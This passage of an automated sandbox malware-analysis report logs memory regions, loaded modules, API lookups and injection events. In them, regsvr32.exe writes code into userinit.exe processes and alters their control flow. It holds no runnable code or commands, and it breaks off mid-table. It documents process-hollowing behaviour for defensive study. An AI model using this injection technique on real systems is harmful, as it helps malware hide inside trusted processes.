private_0x0000000002990000	0x02990000	0x02a92fff	Private Memory	rw	-
private_0x00000000029a0000	0x029a0000	0x02ab2fff	Private Memory	rwx	-
private_0x0000000002ac0000	0x02ac0000	0x02bbffff	Private Memory	-	-
private_0x0000000002be0000	0x02be0000	0x02cdffff	Private Memory	rw	-
sortdefault.nls	0x02ce0000	0x02faefff	Memory Mapped File	r	-
olepro32.dll	0x6d790000	0x6d7a8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6d7b0000	0x6d833fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffdf008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0x89c, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d790000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d7b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Üð, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d7e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d7e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d7e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d7e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d7e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d7e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d7e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d7e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d7e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d7920ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d7920b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d7920c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d7920d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #39: userinit.exe

222

0

»

Information	Value
ID	#39
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:17, Reason: Child Process
Unmonitor	End Time: 00:02:21, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x888
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 8A0 0x 878 0x 4F4

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x00050fff	Private Memory	rw	-
private_0x0000000000060000	0x00060000	0x00060fff	Private Memory	rwx	-
pagefile_0x0000000000070000	0x00070000	0x00076fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000080000	0x00080000	0x00081fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00090000	0x00090fff	Memory Mapped File	r	-
private_0x00000000000a0000	0x000a0000	0x000a0fff	Private Memory	rwx	-
private_0x00000000000b0000	0x000b0000	0x000effff	Private Memory	rw	-
locale.nls	0x000f0000	0x00156fff	Memory Mapped File	r	-
private_0x0000000000160000	0x00160000	0x001effff	Private Memory	rw	-
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	r	-
private_0x00000000001b0000	0x001b0000	0x001effff	Private Memory	rw	-
userinit.exe	0x00200000	0x00208fff	Memory Mapped File	rwx	-
pagefile_0x0000000000210000	0x00210000	0x002d7fff	Pagefile Backed Memory	r	-
private_0x0000000000320000	0x00320000	0x0032ffff	Private Memory	rw	-
private_0x0000000000330000	0x00330000	0x003affff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000590000	0x00590000	0x005cffff	Private Memory	rw	-
private_0x00000000005d0000	0x005d0000	0x006cffff	Private Memory	rw	-
pagefile_0x00000000006d0000	0x006d0000	0x012cffff	Pagefile Backed Memory	r	-
private_0x00000000012d0000	0x012d0000	0x013cffff	Private Memory	-	-
private_0x00000000013d0000	0x013d0000	0x01450fff	Private Memory	rw	-
private_0x00000000013d0000	0x013d0000	0x01454fff	Private Memory	rw	-
private_0x00000000013d0000	0x013d0000	0x01458fff	Private Memory	rw	-
private_0x00000000013d0000	0x013d0000	0x0145cfff	Private Memory	rw	-
private_0x00000000013d0000	0x013d0000	0x01460fff	Private Memory	rw	-
private_0x00000000013d0000	0x013d0000	0x01464fff	Private Memory	rw	-
private_0x00000000013d0000	0x013d0000	0x01468fff	Private Memory	rw	-
private_0x00000000013d0000	0x013d0000	0x0146cfff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0147ffff	Private Memory	rw	-
pagefile_0x0000000001480000	0x01480000	0x0155efff	Pagefile Backed Memory	r	-
private_0x0000000001560000	0x01560000	0x0175ffff	Private Memory	rw	-
private_0x0000000001560000	0x01560000	0x0166cfff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x016f2fff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x016f6fff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x016fafff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x016fefff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x01702fff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x01706fff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x0170afff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x0170efff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x01712fff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x01716fff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x0171afff	Private Memory	rw	-
private_0x0000000001670000	0x01670000	0x0171efff	Private Memory	rw	-
private_0x0000000001720000	0x01720000	0x0175ffff	Private Memory	rw	-
staticcache.dat	0x01760000	0x0208ffff	Memory Mapped File	r	-
pagefile_0x0000000002090000	0x02090000	0x02482fff	Pagefile Backed Memory	r	-
private_0x0000000002490000	0x02490000	0x0258ffff	Private Memory	rw	-
private_0x0000000002590000	0x02590000	0x0278ffff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02830fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02834fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02838fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0283cfff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02840fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02844fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02848fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0284cfff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02852fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02856fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0285afff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0285efff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02864fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02868fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0286cfff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02872fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02876fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0287afff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0287efff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02884fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02888fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0288cfff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02892fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02896fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0289afff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0289ffff	Private Memory	-	-
private_0x0000000002850000	0x02850000	0x02902fff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x02906fff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x0290afff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x0290efff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x02924fff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x02928fff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x0292cfff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x02930fff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x02946fff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x0294afff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x0294efff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x02964fff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x02968fff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x0296cfff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x02970fff	Private Memory	rw	-
private_0x0000000002890000	0x02890000	0x02986fff	Private Memory	rw	-
private_0x0000000002890000	0x02890000	0x0298afff	Private Memory	rw	-
private_0x0000000002890000	0x02890000	0x0298efff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x029a4fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x029a8fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x029acfff	Private Memory	rw	-
private_0x0000000002910000	0x02910000	0x029d0fff	Private Memory	rw	-
private_0x0000000002940000	0x02940000	0x02a12fff	Private Memory	rw	-
private_0x0000000002950000	0x02950000	0x02a30fff	Private Memory	rw	-
private_0x0000000002980000	0x02980000	0x02a72fff	Private Memory	rw	-
private_0x0000000002990000	0x02990000	0x02a90fff	Private Memory	rw	-
private_0x00000000029b0000	0x029b0000	0x02ac2fff	Private Memory	rwx	-
private_0x0000000002ad0000	0x02ad0000	0x02bcffff	Private Memory	-	-
private_0x0000000002cb0000	0x02cb0000	0x02daffff	Private Memory	rw	-
sortdefault.nls	0x02db0000	0x0307efff	Memory Mapped File	r	-
olepro32.dll	0x6d770000	0x6d788fff	Memory Mapped File	rwx	-
comctl32.dll	0x6d7b0000	0x6d833fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffd5008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x8a0, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
